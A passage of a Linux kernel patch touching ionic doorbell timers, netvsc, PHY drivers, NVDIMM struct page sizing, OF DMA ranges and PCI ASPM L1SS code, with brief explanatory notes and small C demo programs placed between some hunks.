++	if (resched)
++		mod_timer(&lif->adminqcq->napi_deadline,
++			  jiffies + IONIC_NAPI_DEADLINE);
++
+ 	return work_done;
+ }
+ 
+@@ -3166,8 +3208,14 @@ static int ionic_lif_adminq_init(struct ionic_lif *lif)
+ 	dev_dbg(dev, "adminq->hw_type %d\n", q->hw_type);
+ 	dev_dbg(dev, "adminq->hw_index %d\n", q->hw_index);
+ 
++	q->dbell_deadline = IONIC_ADMIN_DOORBELL_DEADLINE;
++	q->dbell_jiffies = jiffies;
++
+ 	netif_napi_add(lif->netdev, &qcq->napi, ionic_adminq_napi);
+ 
++	qcq->napi_qcq = qcq;
++	timer_setup(&qcq->napi_deadline, ionic_napi_deadline, 0);
++
+ 	napi_enable(&qcq->napi);
+ 
+ 	if (qcq->flags & IONIC_QCQ_F_INTR)
+diff --git a/drivers/net/ethernet/pensando/ionic/ionic_lif.h b/drivers/net/ethernet/pensando/ionic/ionic_lif.h
+index a53984bf35448..734519895614f 100644
+--- a/drivers/net/ethernet/pensando/ionic/ionic_lif.h
++++ b/drivers/net/ethernet/pensando/ionic/ionic_lif.h
+@@ -74,8 +74,10 @@ struct ionic_qcq {
+ 	struct ionic_queue q;
+ 	struct ionic_cq cq;
+ 	struct ionic_intr_info intr;
++	struct timer_list napi_deadline;
+ 	struct napi_struct napi;
+ 	unsigned int flags;
++	struct ionic_qcq *napi_qcq;
+ 	struct dentry *dentry;
+ };
+ 
+diff --git a/drivers/net/ethernet/pensando/ionic/ionic_main.c b/drivers/net/ethernet/pensando/ionic/ionic_main.c
+index 5456c2b15d9bd..79272f5f380c6 100644
+--- a/drivers/net/ethernet/pensando/ionic/ionic_main.c
++++ b/drivers/net/ethernet/pensando/ionic/ionic_main.c
+@@ -289,6 +289,35 @@ static void ionic_adminq_cb(struct ionic_queue *q,
+ 	complete_all(&ctx->work);
+ }
+ 
++bool ionic_adminq_poke_doorbell(struct ionic_queue *q)
++{
++	struct ionic_lif *lif = q->lif;
++	unsigned long now, then, dif;
++	unsigned long irqflags;
++
++	spin_lock_irqsave(&lif->adminq_lock, irqflags);
++
++	if (q->tail_idx == q->head_idx) {
++		spin_unlock_irqrestore(&lif->adminq_lock, irqflags);
++		return false;
++	}
++
++	now = READ_ONCE(jiffies);
++	then = q->dbell_jiffies;
++	dif = now - then;
++
++	if (dif > q->dbell_deadline) {
++		ionic_dbell_ring(q->lif->kern_dbpage, q->hw_type,
++				 q->dbval | q->head_idx);
++
++		q->dbell_jiffies = now;
++	}
++
++	spin_unlock_irqrestore(&lif->adminq_lock, irqflags);
++
++	return true;
++}
++
+ int ionic_adminq_post(struct ionic_lif *lif, struct ionic_admin_ctx *ctx)
+ {
+ 	struct ionic_desc_info *desc_info;
+diff --git a/drivers/net/ethernet/pensando/ionic/ionic_txrx.c b/drivers/net/ethernet/pensando/ionic/ionic_txrx.c
+index c03986bf26289..f8f5eb1307681 100644
+--- a/drivers/net/ethernet/pensando/ionic/ionic_txrx.c
++++ b/drivers/net/ethernet/pensando/ionic/ionic_txrx.c
+@@ -22,6 +22,67 @@ static inline void ionic_rxq_post(struct ionic_queue *q, bool ring_dbell,
+ 	ionic_q_post(q, ring_dbell, cb_func, cb_arg);
+ }
+ 
++bool ionic_txq_poke_doorbell(struct ionic_queue *q)
++{
++	unsigned long now, then, dif;
++	struct netdev_queue *netdev_txq;
++	struct net_device *netdev;
++
++	netdev = q->lif->netdev;
++	netdev_txq = netdev_get_tx_queue(netdev, q->index);
++
++	HARD_TX_LOCK(netdev, netdev_txq, smp_processor_id());
++
++	if (q->tail_idx == q->head_idx) {
++		HARD_TX_UNLOCK(netdev, netdev_txq);
++		return false;
++	}
++
++	now = READ_ONCE(jiffies);
++	then = q->dbell_jiffies;
++	dif = now - then;
++
++	if (dif > q->dbell_deadline) {
++		ionic_dbell_ring(q->lif->kern_dbpage, q->hw_type,
++				 q->dbval | q->head_idx);
++
++		q->dbell_jiffies = now;
++	}
++
++	HARD_TX_UNLOCK(netdev, netdev_txq);
++
++	return true;
++}
++
++bool ionic_rxq_poke_doorbell(struct ionic_queue *q)
++{
++	unsigned long now, then, dif;
++
++	/* no lock, called from rx napi or txrx napi, nothing else can fill */
++
++	if (q->tail_idx == q->head_idx)
++		return false;
++
++	now = READ_ONCE(jiffies);
++	then = q->dbell_jiffies;
++	dif = now - then;
++
++	if (dif > q->dbell_deadline) {
++		ionic_dbell_ring(q->lif->kern_dbpage, q->hw_type,
++				 q->dbval | q->head_idx);
++
++		q->dbell_jiffies = now;
++
++		dif = 2 * q->dbell_deadline;
++		if (dif > IONIC_RX_MAX_DOORBELL_DEADLINE)
++			dif = IONIC_RX_MAX_DOORBELL_DEADLINE;
++
++		q->dbell_deadline = dif;
++	}
++
++	return true;
++}
++
+ static inline struct netdev_queue *q_to_ndq(struct ionic_queue *q)
+ {
+ 	return netdev_get_tx_queue(q->lif->netdev, q->index);
+@@ -348,16 +409,25 @@ void ionic_rx_fill(struct ionic_queue *q)
+ 	struct ionic_rxq_sg_desc *sg_desc;
+ 	struct ionic_rxq_sg_elem *sg_elem;
+ 	struct ionic_buf_info *buf_info;
++	unsigned int fill_threshold;
+ 	struct ionic_rxq_desc *desc;
+ 	unsigned int remain_len;
+ 	unsigned int frag_len;
+ 	unsigned int nfrags;
++	unsigned int n_fill;
+ 	unsigned int i, j;
+ 	unsigned int len;
+ 
++	n_fill = ionic_q_space_avail(q);
++
++	fill_threshold = min_t(unsigned int, IONIC_RX_FILL_THRESHOLD,
++			       q->num_descs / IONIC_RX_FILL_DIV);
++	if (n_fill < fill_threshold)
++		return;
++
+ 	len = netdev->mtu + ETH_HLEN + VLAN_HLEN;
+ 
+-	for (i = ionic_q_space_avail(q); i; i--) {
++	for (i = n_fill; i; i--) {
+ 		nfrags = 0;
+ 		remain_len = len;
+ 		desc_info = &q->info[q->head_idx];
+@@ -415,6 +485,12 @@ void ionic_rx_fill(struct ionic_queue *q)
+ 
+ 	ionic_dbell_ring(q->lif->kern_dbpage, q->hw_type,
+ 			 q->dbval | q->head_idx);
++
++	q->dbell_deadline = IONIC_RX_MIN_DOORBELL_DEADLINE;
++	q->dbell_jiffies = jiffies;
++
++	mod_timer(&q_to_qcq(q)->napi_qcq->napi_deadline,
++		  jiffies + IONIC_NAPI_DEADLINE);
+ }
+ 
+ void ionic_rx_empty(struct ionic_queue *q)
+@@ -502,6 +578,9 @@ int ionic_tx_napi(struct napi_struct *napi, int budget)
+ 				   work_done, flags);
+ 	}
+ 
++	if (!work_done && ionic_txq_poke_doorbell(&qcq->q))
++		mod_timer(&qcq->napi_deadline, jiffies + IONIC_NAPI_DEADLINE);
++
+ 	return work_done;
+ }
+ 
+@@ -511,7 +590,6 @@ int ionic_rx_napi(struct napi_struct *napi, int budget)
+ 	struct ionic_cq *cq = napi_to_cq(napi);
+ 	struct ionic_dev *idev;
+ 	struct ionic_lif *lif;
+-	u16 rx_fill_threshold;
+ 	u32 work_done = 0;
+ 	u32 flags = 0;
+ 
+@@ -521,10 +599,7 @@ int ionic_rx_napi(struct napi_struct *napi, int budget)
+ 	work_done = ionic_cq_service(cq, budget,
+ 				     ionic_rx_service, NULL, NULL);
+ 
+-	rx_fill_threshold = min_t(u16, IONIC_RX_FILL_THRESHOLD,
+-				  cq->num_descs / IONIC_RX_FILL_DIV);
+-	if (work_done && ionic_q_space_avail(cq->bound_q) >= rx_fill_threshold)
+-		ionic_rx_fill(cq->bound_q);
++	ionic_rx_fill(cq->bound_q);
+ 
+ 	if (work_done < budget && napi_complete_done(napi, work_done)) {
+ 		ionic_dim_update(qcq, IONIC_LIF_F_RX_DIM_INTR);
+@@ -539,24 +614,29 @@ int ionic_rx_napi(struct napi_struct *napi, int budget)
+ 				   work_done, flags);
+ 	}
+ 
++	if (!work_done && ionic_rxq_poke_doorbell(&qcq->q))
++		mod_timer(&qcq->napi_deadline, jiffies + IONIC_NAPI_DEADLINE);
++
+ 	return work_done;
+ }
+ 
+ int ionic_txrx_napi(struct napi_struct *napi, int budget)
+ {
+-	struct ionic_qcq *qcq = napi_to_qcq(napi);
++	struct ionic_qcq *rxqcq = napi_to_qcq(napi);
+ 	struct ionic_cq *rxcq = napi_to_cq(napi);
+ 	unsigned int qi = rxcq->bound_q->index;
++	struct ionic_qcq *txqcq;
+ 	struct ionic_dev *idev;
+ 	struct ionic_lif *lif;
+ 	struct ionic_cq *txcq;
+-	u16 rx_fill_threshold;
++	bool resched = false;
+ 	u32 rx_work_done = 0;
+ 	u32 tx_work_done = 0;
+ 	u32 flags = 0;
+ 
+ 	lif = rxcq->bound_q->lif;
+ 	idev = &lif->ionic->idev;
++	txqcq = lif->txqcqs[qi];
+ 	txcq = &lif->txqcqs[qi]->cq;
+ 
+ 	tx_work_done = ionic_cq_service(txcq, IONIC_TX_BUDGET_DEFAULT,
+@@ -565,13 +645,10 @@ int ionic_txrx_napi(struct napi_struct *napi, int budget)
+ 	rx_work_done = ionic_cq_service(rxcq, budget,
+ 					ionic_rx_service, NULL, NULL);
+ 
+-	rx_fill_threshold = min_t(u16, IONIC_RX_FILL_THRESHOLD,
+-				  rxcq->num_descs / IONIC_RX_FILL_DIV);
+-	if (rx_work_done && ionic_q_space_avail(rxcq->bound_q) >= rx_fill_threshold)
+-		ionic_rx_fill(rxcq->bound_q);
++	ionic_rx_fill(rxcq->bound_q);
+ 
+ 	if (rx_work_done < budget && napi_complete_done(napi, rx_work_done)) {
+-		ionic_dim_update(qcq, 0);
++		ionic_dim_update(rxqcq, 0);
+ 		flags |= IONIC_INTR_CRED_UNMASK;
+ 		rxcq->bound_intr->rearm_count++;
+ 	}
+@@ -582,6 +659,13 @@ int ionic_txrx_napi(struct napi_struct *napi, int budget)
+ 				   tx_work_done + rx_work_done, flags);
+ 	}
+ 
++	if (!rx_work_done && ionic_rxq_poke_doorbell(&rxqcq->q))
++		resched = true;
++	if (!tx_work_done && ionic_txq_poke_doorbell(&txqcq->q))
++		resched = true;
++	if (resched)
++		mod_timer(&rxqcq->napi_deadline, jiffies + IONIC_NAPI_DEADLINE);
++
+ 	return rx_work_done;
+ }
+ 
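All three poke helpers in the ionic hunks above rely on the same wraparound-safe idiom: subtract the saved jiffies stamp from the current one with unsigned arithmetic and compare the difference against the deadline. A standalone sketch of that idiom (plain C, with made-up tick values rather than the driver's jiffies):

#include <stdbool.h>
#include <stdio.h>

/* Wraparound-safe "has the deadline passed?" check: unsigned
 * subtraction yields the elapsed ticks even if 'now' wrapped
 * past zero after 'then' was recorded. */
static bool deadline_passed(unsigned long now, unsigned long then,
			    unsigned long deadline)
{
	return now - then > deadline;
}

int main(void)
{
	unsigned long then = (unsigned long)-5;	/* just before wraparound */
	unsigned long now = 10;			/* 15 ticks later */

	printf("elapsed=%lu passed=%d\n",
	       now - then, deadline_passed(now, then, 12));
	return 0;
}
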
+diff --git a/drivers/net/hyperv/netvsc.c b/drivers/net/hyperv/netvsc.c
+index e02d1e3ef672a..79f4e13620a46 100644
+--- a/drivers/net/hyperv/netvsc.c
++++ b/drivers/net/hyperv/netvsc.c
+@@ -1034,7 +1034,7 @@ static int netvsc_dma_map(struct hv_device *hv_dev,
+ 
+ 	packet->dma_range = kcalloc(page_count,
+ 				    sizeof(*packet->dma_range),
+-				    GFP_KERNEL);
++				    GFP_ATOMIC);
+ 	if (!packet->dma_range)
+ 		return -ENOMEM;
+ 
+diff --git a/drivers/net/phy/meson-gxl.c b/drivers/net/phy/meson-gxl.c
+index 5e41658b1e2fa..a6015cd03bff8 100644
+--- a/drivers/net/phy/meson-gxl.c
++++ b/drivers/net/phy/meson-gxl.c
+@@ -261,6 +261,8 @@ static struct phy_driver meson_gxl_phy[] = {
+ 		.handle_interrupt = meson_gxl_handle_interrupt,
+ 		.suspend        = genphy_suspend,
+ 		.resume         = genphy_resume,
++		.read_mmd	= genphy_read_mmd_unsupported,
++		.write_mmd	= genphy_write_mmd_unsupported,
+ 	}, {
+ 		PHY_ID_MATCH_EXACT(0x01803301),
+ 		.name		= "Meson G12A Internal PHY",
+diff --git a/drivers/net/phy/phylink.c b/drivers/net/phy/phylink.c
+index 2805b04d64028..a202ce6611fde 100644
+--- a/drivers/net/phy/phylink.c
++++ b/drivers/net/phy/phylink.c
+@@ -1793,10 +1793,9 @@ int phylink_fwnode_phy_connect(struct phylink *pl,
+ 
+ 	ret = phy_attach_direct(pl->netdev, phy_dev, flags,
+ 				pl->link_interface);
+-	if (ret) {
+-		phy_device_free(phy_dev);
++	phy_device_free(phy_dev);
++	if (ret)
+ 		return ret;
+-	}
+ 
+ 	ret = phylink_bringup_phy(pl, phy_dev, pl->link_config.interface);
+ 	if (ret)
+diff --git a/drivers/net/usb/plusb.c b/drivers/net/usb/plusb.c
+index 2c82fbcaab223..7a2b0094de51f 100644
+--- a/drivers/net/usb/plusb.c
++++ b/drivers/net/usb/plusb.c
+@@ -57,9 +57,7 @@
+ static inline int
+ pl_vendor_req(struct usbnet *dev, u8 req, u8 val, u8 index)
+ {
+-	return usbnet_read_cmd(dev, req,
+-				USB_DIR_IN | USB_TYPE_VENDOR |
+-				USB_RECIP_DEVICE,
++	return usbnet_write_cmd(dev, req, USB_TYPE_VENDOR | USB_RECIP_DEVICE,
+ 				val, index, NULL, 0);
+ }
+ 
+diff --git a/drivers/nvdimm/Kconfig b/drivers/nvdimm/Kconfig
+index 5a29046e3319d..e4c20f0cb0494 100644
+--- a/drivers/nvdimm/Kconfig
++++ b/drivers/nvdimm/Kconfig
+@@ -102,6 +102,25 @@ config NVDIMM_KEYS
+ 	depends on ENCRYPTED_KEYS
+ 	depends on (LIBNVDIMM=ENCRYPTED_KEYS) || LIBNVDIMM=m
+ 
++config NVDIMM_KMSAN
++	bool
++	depends on KMSAN
++	help
++	  KMSAN, and other memory debug facilities, increase the size of
++	  'struct page' to contain extra metadata. This collides with
++	  the NVDIMM capability to store a potentially
++	  larger-than-"System RAM" size 'struct page' array in a
++	  reservation of persistent memory rather than limited /
++	  precious DRAM. However, that reservation needs to persist for
++	  the life of the given NVDIMM namespace. If you are using KMSAN
++	  to debug an issue unrelated to NVDIMMs or DAX then say N to this
++	  option. Otherwise, say Y but understand that any namespaces
++	  (with the page array stored in pmem) created with this build of
++	  the kernel will permanently reserve and strand excess
++	  capacity compared to the CONFIG_KMSAN=n case.
++
++	  Select N if unsure.
++
+ config NVDIMM_TEST_BUILD
+ 	tristate "Build the unit test core"
+ 	depends on m
+diff --git a/drivers/nvdimm/nd.h b/drivers/nvdimm/nd.h
+index 85ca5b4da3cf3..ec5219680092d 100644
+--- a/drivers/nvdimm/nd.h
++++ b/drivers/nvdimm/nd.h
+@@ -652,7 +652,7 @@ void devm_namespace_disable(struct device *dev,
+ 		struct nd_namespace_common *ndns);
+ #if IS_ENABLED(CONFIG_ND_CLAIM)
+ /* max struct page size independent of kernel config */
+-#define MAX_STRUCT_PAGE_SIZE 128
++#define MAX_STRUCT_PAGE_SIZE 64
+ int nvdimm_setup_pfn(struct nd_pfn *nd_pfn, struct dev_pagemap *pgmap);
+ #else
+ static inline int nvdimm_setup_pfn(struct nd_pfn *nd_pfn,
+diff --git a/drivers/nvdimm/pfn_devs.c b/drivers/nvdimm/pfn_devs.c
+index 61af072ac98f9..af7d9301520c5 100644
+--- a/drivers/nvdimm/pfn_devs.c
++++ b/drivers/nvdimm/pfn_devs.c
+@@ -13,6 +13,8 @@
+ #include "pfn.h"
+ #include "nd.h"
+ 
++static const bool page_struct_override = IS_ENABLED(CONFIG_NVDIMM_KMSAN);
++
+ static void nd_pfn_release(struct device *dev)
+ {
+ 	struct nd_region *nd_region = to_nd_region(dev->parent);
+@@ -758,12 +760,6 @@ static int nd_pfn_init(struct nd_pfn *nd_pfn)
+ 		return -ENXIO;
+ 	}
+ 
+-	/*
+-	 * Note, we use 64 here for the standard size of struct page,
+-	 * debugging options may cause it to be larger in which case the
+-	 * implementation will limit the pfns advertised through
+-	 * ->direct_access() to those that are included in the memmap.
+-	 */
+ 	start = nsio->res.start;
+ 	size = resource_size(&nsio->res);
+ 	npfns = PHYS_PFN(size - SZ_8K);
+@@ -782,20 +778,33 @@ static int nd_pfn_init(struct nd_pfn *nd_pfn)
+ 	}
+ 	end_trunc = start + size - ALIGN_DOWN(start + size, align);
+ 	if (nd_pfn->mode == PFN_MODE_PMEM) {
++		unsigned long page_map_size = MAX_STRUCT_PAGE_SIZE * npfns;
++
+ 		/*
+ 		 * The altmap should be padded out to the block size used
+ 		 * when populating the vmemmap. This *should* be equal to
+ 		 * PMD_SIZE for most architectures.
+ 		 *
+-		 * Also make sure size of struct page is less than 128. We
+-		 * want to make sure we use large enough size here so that
+-		 * we don't have a dynamic reserve space depending on
+-		 * struct page size. But we also want to make sure we notice
+-		 * when we end up adding new elements to struct page.
++		 * Also make sure size of struct page is less than
++		 * MAX_STRUCT_PAGE_SIZE. The goal here is compatibility in the
++		 * face of production kernel configurations that reduce the
++		 * 'struct page' size below MAX_STRUCT_PAGE_SIZE. For debug
++		 * kernel configurations that increase the 'struct page' size
++		 * above MAX_STRUCT_PAGE_SIZE, the page_struct_override allows
++		 * for continuing with the capacity that will be wasted when
++		 * reverting to a production kernel configuration. Otherwise,
++		 * those configurations are blocked by default.
+ 		 */
+-		BUILD_BUG_ON(sizeof(struct page) > MAX_STRUCT_PAGE_SIZE);
+-		offset = ALIGN(start + SZ_8K + MAX_STRUCT_PAGE_SIZE * npfns, align)
+-			- start;
++		if (sizeof(struct page) > MAX_STRUCT_PAGE_SIZE) {
++			if (page_struct_override)
++				page_map_size = sizeof(struct page) * npfns;
++			else {
++				dev_err(&nd_pfn->dev,
++					"Memory debug options prevent using pmem for the page map\n");
++				return -EINVAL;
++			}
++		}
++		offset = ALIGN(start + SZ_8K + page_map_size, align) - start;
+ 	} else if (nd_pfn->mode == PFN_MODE_RAM)
+ 		offset = ALIGN(start + SZ_8K, align) - start;
+ 	else
+@@ -818,7 +827,10 @@ static int nd_pfn_init(struct nd_pfn *nd_pfn)
+ 	pfn_sb->version_minor = cpu_to_le16(4);
+ 	pfn_sb->end_trunc = cpu_to_le32(end_trunc);
+ 	pfn_sb->align = cpu_to_le32(nd_pfn->align);
+-	pfn_sb->page_struct_size = cpu_to_le16(MAX_STRUCT_PAGE_SIZE);
++	if (sizeof(struct page) > MAX_STRUCT_PAGE_SIZE && page_struct_override)
++		pfn_sb->page_struct_size = cpu_to_le16(sizeof(struct page));
++	else
++		pfn_sb->page_struct_size = cpu_to_le16(MAX_STRUCT_PAGE_SIZE);
+ 	pfn_sb->page_size = cpu_to_le32(PAGE_SIZE);
+ 	checksum = nd_sb_checksum((struct nd_gen_sb *) pfn_sb);
+ 	pfn_sb->checksum = cpu_to_le64(checksum);
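The offset computed above is why MAX_STRUCT_PAGE_SIZE matters: the page map is carved out of the persistent namespace itself, so the per-page constant directly scales capacity that stays reserved for the life of the namespace. A rough standalone calculation for a hypothetical 1 TiB namespace (ALIGN_UP and SZ_8K mirror the kernel macros; the numbers are illustrative only):

#include <stdio.h>

#define SZ_8K		(8ULL << 10)
#define ALIGN_UP(x, a)	(((x) + (a) - 1) & ~((a) - 1))

int main(void)
{
	unsigned long long start = 0, size = 1ULL << 40; /* 1 TiB namespace */
	unsigned long long align = 1ULL << 21;           /* 2 MiB (PMD_SIZE) */
	unsigned long long npfns = (size - SZ_8K) >> 12; /* 4 KiB pages */
	unsigned long long per_page[] = { 64, 128 };

	for (int i = 0; i < 2; i++) {
		unsigned long long map = per_page[i] * npfns;
		unsigned long long offset =
			ALIGN_UP(start + SZ_8K + map, align) - start;

		printf("%3llu B/page -> %llu MiB reserved\n",
		       per_page[i], offset >> 20);
	}
	return 0;
}

Dropping the constant from 128 to 64 bytes per page halves that permanent reservation, which is why configurations with an oversized debug 'struct page' are now rejected unless NVDIMM_KMSAN is selected.
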
+diff --git a/drivers/of/address.c b/drivers/of/address.c
+index c34ac33b7338a..67763e5b8c0ef 100644
+--- a/drivers/of/address.c
++++ b/drivers/of/address.c
+@@ -965,8 +965,19 @@ int of_dma_get_range(struct device_node *np, const struct bus_dma_region **map)
+ 	}
+ 
+ 	of_dma_range_parser_init(&parser, node);
+-	for_each_of_range(&parser, &range)
++	for_each_of_range(&parser, &range) {
++		if (range.cpu_addr == OF_BAD_ADDR) {
++			pr_err("translation of DMA address(%llx) to CPU address failed node(%pOF)\n",
++			       range.bus_addr, node);
++			continue;
++		}
+ 		num_ranges++;
++	}
++
++	if (!num_ranges) {
++		ret = -EINVAL;
++		goto out;
++	}
+ 
+ 	r = kcalloc(num_ranges + 1, sizeof(*r), GFP_KERNEL);
+ 	if (!r) {
+@@ -975,18 +986,16 @@ int of_dma_get_range(struct device_node *np, const struct bus_dma_region **map)
+ 	}
+ 
+ 	/*
+-	 * Record all info in the generic DMA ranges array for struct device.
++	 * Record all info in the generic DMA ranges array for struct device,
++	 * returning an error if we don't find any parsable ranges.
+ 	 */
+ 	*map = r;
+ 	of_dma_range_parser_init(&parser, node);
+ 	for_each_of_range(&parser, &range) {
+ 		pr_debug("dma_addr(%llx) cpu_addr(%llx) size(%llx)\n",
+ 			 range.bus_addr, range.cpu_addr, range.size);
+-		if (range.cpu_addr == OF_BAD_ADDR) {
+-			pr_err("translation of DMA address(%llx) to CPU address failed node(%pOF)\n",
+-			       range.bus_addr, node);
++		if (range.cpu_addr == OF_BAD_ADDR)
+ 			continue;
+-		}
+ 		r->cpu_start = range.cpu_addr;
+ 		r->dma_start = range.bus_addr;
+ 		r->size = range.size;
+diff --git a/drivers/of/platform.c b/drivers/of/platform.c
+index 3507095a69f69..6e93fd37ccd1a 100644
+--- a/drivers/of/platform.c
++++ b/drivers/of/platform.c
+@@ -526,6 +526,7 @@ static int __init of_platform_default_populate_init(void)
+ 	if (IS_ENABLED(CONFIG_PPC)) {
+ 		struct device_node *boot_display = NULL;
+ 		struct platform_device *dev;
++		int display_number = 0;
+ 		int ret;
+ 
+ 		/* Check if we have a MacOS display without a node spec */
+@@ -556,16 +557,23 @@ static int __init of_platform_default_populate_init(void)
+ 			if (!of_get_property(node, "linux,opened", NULL) ||
+ 			    !of_get_property(node, "linux,boot-display", NULL))
+ 				continue;
+-			dev = of_platform_device_create(node, "of-display", NULL);
++			dev = of_platform_device_create(node, "of-display.0", NULL);
++			of_node_put(node);
+ 			if (WARN_ON(!dev))
+ 				return -ENOMEM;
+ 			boot_display = node;
++			display_number++;
+ 			break;
+ 		}
+ 		for_each_node_by_type(node, "display") {
++			char buf[14];
++			const char *of_display_format = "of-display.%d";
++
+ 			if (!of_get_property(node, "linux,opened", NULL) || node == boot_display)
+ 				continue;
+-			of_platform_device_create(node, "of-display", NULL);
++			ret = snprintf(buf, sizeof(buf), of_display_format, display_number++);
++			if (ret < sizeof(buf))
++				of_platform_device_create(node, buf, NULL);
+ 		}
+ 
+ 	} else {
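The 14-byte buffer above is sized for "of-display." (11 characters) plus a two-digit index and the terminating NUL, and the ret < sizeof(buf) guard skips any display whose name would be truncated. The boundary is easy to confirm in isolation:

#include <stdio.h>

int main(void)
{
	char buf[14];	/* "of-display." + up to 2 digits + NUL */

	for (int n = 98; n <= 101; n++) {
		int ret = snprintf(buf, sizeof(buf), "of-display.%d", n);

		/* Same guard as the hunk: only use the name if it fit. */
		printf("%-3d ret=%d %s\n", n, ret,
		       ret < (int)sizeof(buf) ? buf : "(skipped: truncated)");
	}
	return 0;
}

Indices 0-99 fit exactly ("of-display.99" plus NUL is 14 bytes); from 100 on, snprintf() reports 14 or more would-be characters and the device is not created.
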
+diff --git a/drivers/pci/pci.c b/drivers/pci/pci.c
+index ab615ab4e4409..6d81df459b2f0 100644
+--- a/drivers/pci/pci.c
++++ b/drivers/pci/pci.c
+@@ -1665,7 +1665,6 @@ int pci_save_state(struct pci_dev *dev)
+ 		return i;
+ 
+ 	pci_save_ltr_state(dev);
+-	pci_save_aspm_l1ss_state(dev);
+ 	pci_save_dpc_state(dev);
+ 	pci_save_aer_state(dev);
+ 	pci_save_ptm_state(dev);
+@@ -1772,7 +1771,6 @@ void pci_restore_state(struct pci_dev *dev)
+ 	 * LTR itself (in the PCIe capability).
+ 	 */
+ 	pci_restore_ltr_state(dev);
+-	pci_restore_aspm_l1ss_state(dev);
+ 
+ 	pci_restore_pcie_state(dev);
+ 	pci_restore_pasid_state(dev);
+@@ -3465,11 +3463,6 @@ void pci_allocate_cap_save_buffers(struct pci_dev *dev)
+ 	if (error)
+ 		pci_err(dev, "unable to allocate suspend buffer for LTR\n");
+ 
+-	error = pci_add_ext_cap_save_buffer(dev, PCI_EXT_CAP_ID_L1SS,
+-					    2 * sizeof(u32));
+-	if (error)
+-		pci_err(dev, "unable to allocate suspend buffer for ASPM-L1SS\n");
+-
+ 	pci_allocate_vc_save_buffers(dev);
+ }
+ 
+diff --git a/drivers/pci/pci.h b/drivers/pci/pci.h
+index b1ebb7ab88051..ce169b12a8f6d 100644
+--- a/drivers/pci/pci.h
++++ b/drivers/pci/pci.h
+@@ -565,14 +565,10 @@ bool pcie_wait_for_link(struct pci_dev *pdev, bool active);
+ void pcie_aspm_init_link_state(struct pci_dev *pdev);
+ void pcie_aspm_exit_link_state(struct pci_dev *pdev);
+ void pcie_aspm_powersave_config_link(struct pci_dev *pdev);
+-void pci_save_aspm_l1ss_state(struct pci_dev *dev);
+-void pci_restore_aspm_l1ss_state(struct pci_dev *dev);
+ #else
+ static inline void pcie_aspm_init_link_state(struct pci_dev *pdev) { }
+ static inline void pcie_aspm_exit_link_state(struct pci_dev *pdev) { }
+ static inline void pcie_aspm_powersave_config_link(struct pci_dev *pdev) { }
+-static inline void pci_save_aspm_l1ss_state(struct pci_dev *dev) { }
+-static inline void pci_restore_aspm_l1ss_state(struct pci_dev *dev) { }
+ #endif
+ 
+ #ifdef CONFIG_PCIE_ECRC
+diff --git a/drivers/pci/pcie/aspm.c b/drivers/pci/pcie/aspm.c
+index 53a1fa306e1ee..4b4184563a927 100644
+--- a/drivers/pci/pcie/aspm.c
++++ b/drivers/pci/pcie/aspm.c
+@@ -470,31 +470,6 @@ static void pci_clear_and_set_dword(struct pci_dev *pdev, int pos,
+ 	pci_write_config_dword(pdev, pos, val);
+ }
+ 
+-static void aspm_program_l1ss(struct pci_dev *dev, u32 ctl1, u32 ctl2)
+-{
+-	u16 l1ss = dev->l1ss;
+-	u32 l1_2_enable;
+-
+-	/*
+-	 * Per PCIe r6.0, sec 5.5.4, T_POWER_ON in PCI_L1SS_CTL2 must be
+-	 * programmed prior to setting the L1.2 enable bits in PCI_L1SS_CTL1.
+-	 */
+-	pci_write_config_dword(dev, l1ss + PCI_L1SS_CTL2, ctl2);
+-
+-	/*
+-	 * In addition, Common_Mode_Restore_Time and LTR_L1.2_THRESHOLD in
+-	 * PCI_L1SS_CTL1 must be programmed *before* setting the L1.2
+-	 * enable bits, even though they're all in PCI_L1SS_CTL1.
+-	 */
+-	l1_2_enable = ctl1 & PCI_L1SS_CTL1_L1_2_MASK;
+-	ctl1 &= ~PCI_L1SS_CTL1_L1_2_MASK;
+-
+-	pci_write_config_dword(dev, l1ss + PCI_L1SS_CTL1, ctl1);
+-	if (l1_2_enable)
+-		pci_write_config_dword(dev, l1ss + PCI_L1SS_CTL1,
+-				       ctl1 | l1_2_enable);
+-}
+-
+ /* Calculate L1.2 PM substate timing parameters */
+ static void aspm_calc_l1ss_info(struct pcie_link_state *link,
+ 				u32 parent_l1ss_cap, u32 child_l1ss_cap)
+@@ -504,6 +479,7 @@ static void aspm_calc_l1ss_info(struct pcie_link_state *link,
+ 	u32 t_common_mode, t_power_on, l1_2_threshold, scale, value;
+ 	u32 ctl1 = 0, ctl2 = 0;
+ 	u32 pctl1, pctl2, cctl1, cctl2;
++	u32 pl1_2_enables, cl1_2_enables;
+ 
+ 	if (!(link->aspm_support & ASPM_STATE_L1_2_MASK))
+ 		return;
+@@ -552,21 +528,39 @@ static void aspm_calc_l1ss_info(struct pcie_link_state *link,
+ 	    ctl2 == pctl2 && ctl2 == cctl2)
+ 		return;
+ 
+-	pctl1 &= ~(PCI_L1SS_CTL1_CM_RESTORE_TIME |
+-		   PCI_L1SS_CTL1_LTR_L12_TH_VALUE |
+-		   PCI_L1SS_CTL1_LTR_L12_TH_SCALE);
+-	pctl1 |= (ctl1 & (PCI_L1SS_CTL1_CM_RESTORE_TIME |
+-			  PCI_L1SS_CTL1_LTR_L12_TH_VALUE |
+-			  PCI_L1SS_CTL1_LTR_L12_TH_SCALE));
+-	aspm_program_l1ss(parent, pctl1, ctl2);
+-
+-	cctl1 &= ~(PCI_L1SS_CTL1_CM_RESTORE_TIME |
+-		   PCI_L1SS_CTL1_LTR_L12_TH_VALUE |
+-		   PCI_L1SS_CTL1_LTR_L12_TH_SCALE);
+-	cctl1 |= (ctl1 & (PCI_L1SS_CTL1_CM_RESTORE_TIME |
+-			  PCI_L1SS_CTL1_LTR_L12_TH_VALUE |
+-			  PCI_L1SS_CTL1_LTR_L12_TH_SCALE));
+-	aspm_program_l1ss(child, cctl1, ctl2);
++	/* Disable L1.2 while updating.  See PCIe r5.0, sec 5.5.4, 7.8.3.3 */
++	pl1_2_enables = pctl1 & PCI_L1SS_CTL1_L1_2_MASK;
++	cl1_2_enables = cctl1 & PCI_L1SS_CTL1_L1_2_MASK;
++
++	if (pl1_2_enables || cl1_2_enables) {
++		pci_clear_and_set_dword(child, child->l1ss + PCI_L1SS_CTL1,
++					PCI_L1SS_CTL1_L1_2_MASK, 0);
++		pci_clear_and_set_dword(parent, parent->l1ss + PCI_L1SS_CTL1,
++					PCI_L1SS_CTL1_L1_2_MASK, 0);
++	}
++
++	/* Program T_POWER_ON times in both ports */
++	pci_write_config_dword(parent, parent->l1ss + PCI_L1SS_CTL2, ctl2);
